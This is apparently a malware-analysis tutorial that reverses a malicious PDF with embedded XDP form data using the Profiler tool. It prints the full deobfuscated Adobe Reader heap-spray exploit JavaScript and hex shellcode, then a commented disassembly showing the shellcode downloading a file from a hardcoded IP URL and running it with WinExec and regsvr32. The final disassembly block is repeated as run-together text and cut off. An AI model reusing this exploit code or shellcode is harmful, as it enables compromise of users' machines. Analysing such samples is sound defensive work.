PDF/XDP Malware Reversing

Version 2.6 of Profiler was released recently, and among its improvements is support for XDP. For those of you who are unfamiliar with XDP, here’s the Wikipedia description:

“XML Data Package (XDP) is an XML file format created by Adobe Systems in 2003. It is intended to be an XML-based companion to PDF. It allows PDF content and/or Adobe XML Forms Architecture (XFA) resources to be packaged within an XML container.

XDP is XML 1.0 compliant. The XDP may be a standalone document or it may in turn be carried inside a PDF document.

XDP provides a mechanism for packaging form components within a surrounding XML container. An XDP can also package a PDF file, along with XML form and template data. When the XFA (XML Forms Architecture) grammars used for an XFA form are moved from one application to another, they must be packaged as an XML Data Package.”

So I’ll use the occasion to show the reversing of a nice PDF with all the goodies. Let’s open the suspicious PDF.

The PDF is already heavily flagged by Profiler, as it contains many suspicious features.

If we take a look at object 8 of the PDF, just out of curiosity, we will notice that the XDP data contains a bogus endstream keyword meant to fool the parsers of security solutions.

Profiler handles this correctly, so we don’t have to do anything; it’s just worth mentioning.
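
To see why a bogus endstream can trip up a parser, here is a minimal sketch. It is not how Profiler works internally (the post doesn't say); it only contrasts a naive "stop at the first endstream" scan with one that takes the last endstream in the object. The function name, the object text and the stream content are all made up for illustration.

```javascript
// Hypothetical helper: returns the stream body of a single PDF object.
// useLast = false -> stop at the first "endstream" (naive scan)
// useLast = true  -> stop at the last "endstream" in the object text
function streamBody(objText, useLast) {
    var kw = objText.indexOf('stream');
    if (kw < 0) return null;
    var begin = kw + 'stream'.length;
    // skip the end-of-line that follows the "stream" keyword
    if (objText.charAt(begin) === '\r') begin++;
    if (objText.charAt(begin) === '\n') begin++;
    var end = useLast ? objText.lastIndexOf('endstream')
                      : objText.indexOf('endstream', begin);
    if (end < begin) return null;
    // drop the end-of-line that precedes the closing keyword
    return objText.substring(begin, end).replace(/\r?\n$/, '');
}

// Made-up object with a decoy keyword inside the data
var obj = '8 0 obj\n<< /Type /EmbeddedFile >>\nstream\n' +
          '<xdp>endstream</xdp>\nendstream\nendobj';

var naive = streamBody(obj, false);   // truncated at the decoy
var robust = streamBody(obj, true);   // full data
```

A real parser has more to deal with (the /Length entry, filters, broken objects), so take this only as an illustration of the trick.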

Let’s take a look at the raw XDP data.

As you can see, it is completely unreadable because of the XML-escaped characters. This isn’t really important for us either, since the XML parser of Profiler handles it automatically; again, it’s just worth mentioning.
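
If you ever need to undo this kind of escaping by hand, a rough sketch could look like the following. The function name is hypothetical, and it only covers the five predefined XML entities plus numeric character references in the BMP, which I'm assuming is enough for a sample like this one.

```javascript
// Hypothetical helper: decodes the predefined XML entities and
// numeric character references (decimal and hexadecimal).
function decodeXmlEntities(text) {
    var named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
    return text.replace(/&(#x[0-9a-fA-F]+|#[0-9]+|[A-Za-z]+);/g, function (match, body) {
        if (body.charAt(0) === '#') {
            var code = (body.charAt(1) === 'x')
                ? parseInt(body.slice(2), 16)
                : parseInt(body.slice(1), 10);
            return String.fromCharCode(code);
        }
        // unknown named entities are left untouched
        return named.hasOwnProperty(body) ? named[body] : match;
    });
}

var decodedXml = decodeXmlEntities('&lt;a&gt; &amp; &#x41;&#66;');   // "<a> & AB"
```

The replacement is done in a single pass, so an already escaped ampersand such as &amp;lt; comes out as &lt; and is not decoded twice.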

So let’s open the embedded XDP child directly, and we can see readable, nicely indented XML.

We can see that the XML contains JavaScript code, but Profiler already warns us of this. So let’s just click on the warning.

The code isn’t readable. So let’s select the JavaScript portion and then press Ctrl+R->Beautify JavaScript.

Much better, isn’t it?

The code is quite easy to understand although it’s obfuscated. It takes a value straight from the XDP, processes it and then calls eval on it.

This is the value it takes:

What we want is the result of the processing, before eval is called. So I slightly modified the JavaScript code like this:

ar = [HUGE STRING];
ar = ar.split('%%%');
s = Array();
cc = {
    q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
function test3()
{
    if (s) v = ar[z] * 1;
    s = s + cc[v + 24];
}

for (i = 0; i - 3794 < 0; i++)
{
    z = i;
    test3();
}

print(s);
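
To make the decoding step easier to follow, here is the same logic written as a small standalone function. The lookup string is the one from the sample; the index list is made up for the demo (the real one is the huge string taken from the XDP), and the function name is mine.

```javascript
// Lookup string copied from the sample
var alphabet = "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM";

// Each '%%%'-separated number, plus the offset, is an index into the table.
function decodeIndexList(encoded, table, offset) {
    var parts = encoded.split('%%%');
    var out = '';
    for (var i = 0; i < parts.length; i++) {
        out += table.charAt(Number(parts[i]) + offset);
    }
    return out;
}

// Made-up input, NOT taken from the sample
var sample = ['-24', '-23', '-22', '-21', '-20', '-23',
              '-19', '-19', '-18', '-17', '-16', '-15'].join('%%%');

var decoded = decodeIndexList(sample, alphabet, 24);   // "var padding;"
```

The offset of 24 matches the cc[v + 24] lookup in the original loop.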

I didn't paste the entire value here as it was way too big, but I did so in the editor:

At this point, we can just press Ctrl+R->Debug/Execute JavaScript and get the result of the execution.

We will get the following code:

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = app;
_l4 = new Array();

function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3()
{
    _j4 = _l5();
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    qwe123b.rawValue = _ll1
}
_j3();

Basically, it sprays the heap using an array, choosing the payload based on the version of Adobe Reader. The version is retrieved by calling the _l5 function.
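
The version check and the size of one spray block are easy to replay outside of Reader. The sketch below mirrors _l5, _l7 and the first half of _I0 with readable names (the names are mine). The version numbers and the 4-byte payload are sample values, not something taken from a real run.

```javascript
// Mirrors _l5: "9.3" -> "93" -> "9300" -> 9300
function normalizeViewerVersion(viewerVersion) {
    var s = String(viewerVersion).replace('.', '');
    while (s.length < 4) s += '0';
    return parseInt(s, 10);
}

// Mirrors _l7: repeat unit until it covers byteLen bytes
// (every character of a JavaScript string takes 2 bytes)
function repeatToBytes(unit, byteLen) {
    while (unit.length * 2 < byteLen) unit += unit;
    return unit.substring(0, byteLen / 2);
}

// Mirrors the first half of _I0: payload followed by 0x9090 filler,
// 0x2000 bytes in total
function buildSprayBlock(payload) {
    var filler = repeatToBytes('\u9090', 0x2000 - payload.length * 2);
    return payload + filler;
}

var v93 = normalizeViewerVersion(9.3);   // 9300: not below 9000, _l2 is used
var v81 = normalizeViewerVersion(8.1);   // 8100: below 9000, _l1 is used

var block = buildSprayBlock('\u4141\u4242');   // hypothetical 4-byte payload
var blockBytes = block.length * 2;             // 0x2000
```

In the original code this block is then repeated up to 524098 bytes and stored 400 times in the _l4 array, which adds up to roughly 200 MB of sprayed data.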

Now we could just examine the _l1 or _l2 payloads directly, but just to make sure, I let the code generate one portion of the spray. So I changed the code accordingly and avoided actually spraying a lot of data.

var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f3132392e3132312e3233312e3138382f646174612f486f6d652f772e7068703f663d313626653d340000';
_l3 = this;
_l4 = new Array();

/*function _l5()
{
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}*/
function _l7(_l8, _l9)
{
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1)
{
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 0x2000);
    for (i = 0; i < 1; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len)
{
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1)
{
    ret = '';
    for (i = 0; i < _I1.length; i += 2)
    {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++)
    {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6)
{
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1)
{
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2)
    {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function asciiToHex(str)
{
    var arr = [];
    for (var n = 0, l = str.length; n < l; n ++) 
    {
        var ch = str.charCodeAt(n);
        var hex = Number(ch & 0xFF).toString(16);
        if (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
        hex = Number(ch >>> 8).toString(16);
        while (hex.length < 2) hex = "0" + hex;
        arr.push(hex);
    }
    return arr.join('');
}
function _j3()
{
    _j4 = 9000;
    if (_j4 < 9000)
    {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    }
    else
    {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('%00');
    _ll3 = _j2(_ll2);
    with(
    {
        k: _ll3
    }) _I0(k);
    print(asciiToHex(_l4[0]));
}
_j3();

We can run this script in the JavaScript debugger (Ctrl+R->Debug JavaScript).

The final print will give us the payload in memory. We can copy just the initial part, leaving out the padding. Let's paste the string into a text editor in Profiler and then use Ctrl+R->Hex string to bytes.

If we look at the payload, we can see that the beginning (the marked portion) looks like ROP code. So in order to avoid looking for the gadgets in memory, let's skip the ROP as it most likely is only going to jump to the actual shellcode. Let's assume that is the case and thus focus on the data which follows.

We can see a web address at the end of the data. So we could just assume that the shellcode downloads an executable and runs it. But just for the sake of completeness, let's analyze it.
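
The same check can be scripted. The sketch below takes the last bytes of the _l1/_l2 hex strings (they are identical in both), converts them to bytes and collects the printable ASCII runs. The helper names and the minimum run length of 8 are my own choices.

```javascript
// Tail of the _l1/_l2 hex strings from the script above
var tailHex = '687474703a2f2f3132392e3132312e3233312e3138382f646174612f' +
              '486f6d652f772e7068703f663d313626653d340000';

// Two hex digits per byte
function hexToBytes(hex) {
    var bytes = [];
    for (var i = 0; i + 1 < hex.length; i += 2) {
        bytes.push(parseInt(hex.substr(i, 2), 16));
    }
    return bytes;
}

// Collects runs of printable ASCII that are at least minLen long
function printableRuns(bytes, minLen) {
    var runs = [];
    var cur = '';
    for (var i = 0; i <= bytes.length; i++) {
        var b = bytes[i];
        if (i < bytes.length && b >= 0x20 && b < 0x7f) {
            cur += String.fromCharCode(b);
        } else {
            if (cur.length >= minLen) runs.push(cur);
            cur = '';
        }
    }
    return runs;
}

var strings = printableRuns(hexToBytes(tailHex), 8);
// strings[0] is the web address stored at the end of the payload
```

Running it over the whole payload instead of just the tail works the same way, it only returns a few more (meaningless) runs.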

We can of course disassemble the shellcode by applying a filter to it (Ctrl+T->x86 disasm). But what we'll do instead is use a debugger via Ctrl+R->Shellcode to execute. This way we can quickly step through what it does.

Here's the commented code:

00000000 66 83 E4 FC and sp, 0xfffc
00000004 FC cld
00000005 85 E4 test esp, esp
00000007 75 34 jne 0x3d
0000000A 5F pop edi
0000000B 33 C0 xor eax, eax
0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30]
00000011 8B 40 0C mov eax, dword ptr [eax + 0xc]
00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c]
00000017 56 push esi
00000018 8B 76 08 mov esi, dword ptr [esi + 8]
0000001B 33 DB xor ebx, ebx
0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c]
00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c]
00000025 81 EE 15 10 FF FF sub esi, 0xffff1015
0000002B B8 8B 40 30 C3 mov eax, 0xc330408b
00000030 46 inc esi
00000031 39 06 cmp dword ptr [esi], eax
00000033 75 FB jne 0x30
00000035 87 34 24 xchg dword ptr [esp], esi
00000038 85 E4 test esp, esp
0000003A 75 51 jne 0x8d
0000003D EB 4C jmp 0x8b
; resolve API
0000003F 51 push ecx
00000040 56 push esi
00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c]
00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78]
00000048 03 F5 add esi, ebp
0000004A 56 push esi
0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20]
0000004E 03 F5 add esi, ebp
00000050 33 C9 xor ecx, ecx
00000052 49 dec ecx
00000053 41 inc ecx
00000054 FC cld
00000055 AD lodsd eax, dword ptr [esi]
00000056 03 C5 add eax, ebp
00000058 33 DB xor ebx, ebx
0000005A 0F BE 10 movsx edx, byte ptr [eax]
0000005D 38 F2 cmp dl, dh
0000005F 74 08 je 0x69
00000061 C1 CB 0D ror ebx, 0xd
00000064 03 DA add ebx, edx
00000066 40 inc eax
00000067 EB F1 jmp 0x5a
00000069 3B 1F cmp ebx, dword ptr [edi]
0000006B 75 E6 jne 0x53
0000006D 5E pop esi
0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24]
00000071 03 DD add ebx, ebp
00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2]
00000077 8D 46 EC lea eax, dword ptr [esi - 0x14]
0000007A FF 54 24 0C call dword ptr [esp + 0xc]
0000007E 8B D8 mov ebx, eax
00000080 03 DD add ebx, ebp
00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4]
00000085 03 C5 add eax, ebp
00000087 AB stosd dword ptr es:[edi], eax
00000088 5E pop esi
00000089 59 pop ecx
0000008A C3 ret
0000008B EB 53 jmp 0xe0
0000008D AD lodsd eax, dword ptr [esi]
0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20]
00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33
00000095 74 03 je 0x9a
00000097 96 xchg eax, esi
00000098 EB F3 jmp 0x8d
0000009A 8B 68 08 mov ebp, dword ptr [eax + 8]
0000009D 8B F7 mov esi, edi
0000009F 6A 05 push 5
000000A1 59 pop ecx
000000A2 E8 98 FF FF FF call 0x3f ; resolve API
000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs:
; LoadLibraryA
; WinExec
; TerminateThread
; GetTempPathA
; VirtualProtect
000000A9 E8 00 00 00 00 call 0xae
000000AE 58 pop eax
000000AF 50 push eax
000000B0 6A 40 push 0x40
000000B2 68 FF 00 00 00 push 0xff
000000B7 50 push eax
000000B8 83 C0 19 add eax, 0x19
000000BB 50 push eax
000000BC 55 push ebp
000000BD 8B EC mov ebp, esp
000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10]
000000C2 83 C3 05 add ebx, 5
000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes
000000C7 68 6F 6E 00 00 push 0x6e6f
000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack
000000D1 54 push esp
000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address
000000D4 83 C4 08 add esp, 8
000000D7 8B E8 mov ebp, eax
000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA
000000DE EB 02 jmp 0xe2
000000E0 EB 72 jmp 0x154
000000E2 81 EC 04 01 00 00 sub esp, 0x104
000000E8 8D 5C 24 0C lea ebx, dword ptr [esp + 0xc]
000000EC C7 04 24 72 65 67+ mov dword ptr [esp], 0x73676572
000000F3 C7 44 24 04 76 72+ mov dword ptr [esp + 4], 0x32337276
000000FB C7 44 24 08 20 2D+ mov dword ptr [esp + 8], 0x20732d20 ; pushes "regsvr32 -s " to the stack
00000103 53 push ebx
00000104 68 F8 00 00 00 push 0xf8
00000109 FF 56 0C call dword ptr [esi + 0xc] ; call GetTempFilePathA
0000010C 8B E8 mov ebp, eax
0000010E 33 C9 xor ecx, ecx
00000110 51 push ecx
00000111 C7 44 1D 00 77 70+ mov dword ptr [ebp + ebx], 0x74627077
00000119 C7 44 1D 05 2E 64+ mov dword ptr [ebp + ebx + 5], 0x6c6c642e
00000121 C6 44 1D 09 00 mov byte ptr [ebp + ebx + 9], 0 ; appends "wpbt0.dll" to the path
00000126 59 pop ecx
00000127 8A C1 mov al, cl
00000129 04 30 add al, 0x30
0000012B 88 44 1D 04 mov byte ptr [ebp + ebx + 4], al
0000012F 41 inc ecx
00000130 51 push ecx
00000131 6A 00 push 0
00000133 6A 00 push 0
00000135 53 push ebx
00000136 57 push edi
00000137 6A 00 push 0
00000139 FF 56 14 call dword ptr [esi + 0x14] ; calls URLDownloadToFileA with the created path with the URL: http://129.121.231.188/data/Home/w.php?f=16&e=4
0000013C 85 C0 test eax, eax
0000013E 75 16 jne 0x156
00000140 6A 00 push 0
00000142 53 push ebx
00000143 FF 56 04 call dword ptr [esi + 4] ; calls WinExec on the downloaded file
00000146 6A 00 push 0
00000148 83 EB 0C sub ebx, 0xc
0000014B 53 push ebx
0000014C FF 56 04 call dword ptr [esi + 4] ; calls WinExec on "regsvr32 -s " followed by the downloaded file
0000014F 83 C3 0C add ebx, 0xc
00000152 EB 02 jmp 0x156
00000154 EB 13 jmp 0x169
00000156 47 inc edi
00000157 80 3F 00 cmp byte ptr [edi], 0
0000015A 75 FA jne 0x156
0000015C 47 inc edi
0000015D 80 3F 00 cmp byte ptr [edi], 0
00000160 75 C4 jne 0x126
00000162 6A 00 push 0
00000164 6A FE push -2
00000166 FF 56 08 call dword ptr [esi + 8] ; calls TerminateThread
00000169 E8 9C FE FF FF call 0xa
00000000 66 83 E4 FC and sp, 0xfffc 00000004 FC cld 00000005 85 E4 test esp, esp 00000007 75 34 jne 0x3d 0000000A 5F pop edi 0000000B 33 C0 xor eax, eax 0000000D 64 8B 40 30 mov eax, dword ptr fs:[eax + 0x30] 00000011 8B 40 0C mov eax, dword ptr [eax + 0xc] 00000014 8B 70 1C mov esi, dword ptr [eax + 0x1c] 00000017 56 push esi 00000018 8B 76 08 mov esi, dword ptr [esi + 8] 0000001B 33 DB xor ebx, ebx 0000001D 66 8B 5E 3C mov bx, word ptr [esi + 0x3c] 00000021 03 74 33 2C add esi, dword ptr [ebx + esi + 0x2c] 00000025 81 EE 15 10 FF FF sub esi, 0xffff1015 0000002B B8 8B 40 30 C3 mov eax, 0xc330408b 00000030 46 inc esi 00000031 39 06 cmp dword ptr [esi], eax 00000033 75 FB jne 0x30 00000035 87 34 24 xchg dword ptr [esp], esi 00000038 85 E4 test esp, esp 0000003A 75 51 jne 0x8d 0000003D EB 4C jmp 0x8b ; resolve API 0000003F 51 push ecx 00000040 56 push esi 00000041 8B 75 3C mov esi, dword ptr [ebp + 0x3c] 00000044 8B 74 35 78 mov esi, dword ptr [ebp + esi + 0x78] 00000048 03 F5 add esi, ebp 0000004A 56 push esi 0000004B 8B 76 20 mov esi, dword ptr [esi + 0x20] 0000004E 03 F5 add esi, ebp 00000050 33 C9 xor ecx, ecx 00000052 49 dec ecx 00000053 41 inc ecx 00000054 FC cld 00000055 AD lodsd eax, dword ptr [esi] 00000056 03 C5 add eax, ebp 00000058 33 DB xor ebx, ebx 0000005A 0F BE 10 movsx edx, byte ptr [eax] 0000005D 38 F2 cmp dl, dh 0000005F 74 08 je 0x69 00000061 C1 CB 0D ror ebx, 0xd 00000064 03 DA add ebx, edx 00000066 40 inc eax 00000067 EB F1 jmp 0x5a 00000069 3B 1F cmp ebx, dword ptr [edi] 0000006B 75 E6 jne 0x53 0000006D 5E pop esi 0000006E 8B 5E 24 mov ebx, dword ptr [esi + 0x24] 00000071 03 DD add ebx, ebp 00000073 66 8B 0C 4B mov cx, word ptr [ebx + ecx*2] 00000077 8D 46 EC lea eax, dword ptr [esi - 0x14] 0000007A FF 54 24 0C call dword ptr [esp + 0xc] 0000007E 8B D8 mov ebx, eax 00000080 03 DD add ebx, ebp 00000082 8B 04 8B mov eax, dword ptr [ebx + ecx*4] 00000085 03 C5 add eax, ebp 00000087 AB stosd dword ptr es:[edi], eax 00000088 5E pop esi 00000089 59 
pop ecx 0000008A C3 ret 0000008B EB 53 jmp 0xe0 0000008D AD lodsd eax, dword ptr [esi] 0000008E 8B 68 20 mov ebp, dword ptr [eax + 0x20] 00000091 80 7D 0C 33 cmp byte ptr [ebp + 0xc], 0x33 00000095 74 03 je 0x9a 00000097 96 xchg eax, esi 00000098 EB F3 jmp 0x8d 0000009A 8B 68 08 mov ebp, dword ptr [eax + 8] 0000009D 8B F7 mov esi, edi 0000009F 6A 05 push 5 000000A1 59 pop ecx 000000A2 E8 98 FF FF FF call 0x3f ; resolve API 000000A7 E2 F9 loop 0xa2 ; loops resolving the following APIs: ; LoadLibraryA ; WinExec ; TerminateThread ; GetTempPathA ; VirtualProtect 000000A9 E8 00 00 00 00 call 0xae 000000AE 58 pop eax 000000AF 50 push eax 000000B0 6A 40 push 0x40 000000B2 68 FF 00 00 00 push 0xff 000000B7 50 push eax 000000B8 83 C0 19 add eax, 0x19 000000BB 50 push eax 000000BC 55 push ebp 000000BD 8B EC mov ebp, esp 000000BF 8B 5E 10 mov ebx, dword ptr [esi + 0x10] 000000C2 83 C3 05 add ebx, 5 000000C5 FF E3 jmp ebx ; calls VirtualProtect with stolen bytes 000000C7 68 6F 6E 00 00 push 0x6e6f 000000CC 68 75 72 6C 6D push 0x6d6c7275 ; pushes URLMON string to stack 000000D1 54 push esp 000000D2 FF 16 call dword ptr [esi] ; calls a gadget which calls LoadLibraryA and returns the URLMON base address 000000D4 83 C4 08 add esp, 8 000000D7 8B E8 mov ebp, eax 000000D9 E8 61 FF FF FF call 0x3f ; resolves URLDownloadToFileA 000000DE EB 02 jmp 0xe2 000000E0 EB 72 jmp 0x154 000000E2 81 EC 